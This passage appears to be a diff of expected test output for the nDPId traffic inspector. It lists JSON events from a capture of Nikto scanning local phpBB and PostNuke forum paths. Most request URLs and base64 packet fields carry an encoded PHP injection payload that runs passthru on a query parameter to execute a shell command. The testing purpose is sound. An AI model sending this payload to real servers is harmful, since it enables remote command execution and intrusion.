{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01217{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":1,"flow_last_seen":1576420277756,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277756,"pkt":"AAAAAAAAAAAAAAAACABFAAFsUT9AAEAG6kp\/AAABfwAAAca+H5B2qmgj3lZSb4AYAED\/YAAAAQEICp1m\/ySdZv8kR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":1,"flow_last_seen":1576420277758,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277758,"pkt":"AAAAAAAAAAAAAAAACABFAAFmwkJAAEAGeU1\/AAABfwAAAcbAH5DScvtgYIpbaYAYAED\/WgAAAQEICp1m\/yadZv8mR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCg0K"} -01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":1,"flow_last_seen":1576420277760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277760,"pkt":"AAAAAAAAAAAAAAAACABFAAFkSaBAAEAG8fF\/AAABfwAAAcbCH5CzknC\/qWQ1toAYAED\/WAAAAQEICp1m\/yidZv8oR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="} -01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":1,"flow_last_seen":1576420277762,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277762,"pkt":"AAAAAAAAAAAAAAAACABFAAFkl59AAEAGo\/J\/AAABfwAAAcbEH5DhFa6+6BKXhoAYAED\/WAAAAQEICp1m\/yqdZv8qR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="} -01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_packet_id":1,"flow_last_seen":1576420277764,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277764,"pkt":"AAAAAAAAAAAAAAAACABFAAFdzxpAAEAGbH5\/AAABfwAAAcbGH5DgufY6a2RlI4AYAED\/UQAAAQEICp1m\/yydZv8sR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCg0K"} -01206{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01206{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_packet_id":1,"flow_last_seen":1576420277766,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277766,"pkt":"AAAAAAAAAAAAAAAACABFAAFm3WVAAEAGXip\/AAABfwAAAcbIH5DcNuRDgHH2c4AYAED\/WgAAAQEICp1m\/y2dZv8tR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":663,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277766,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 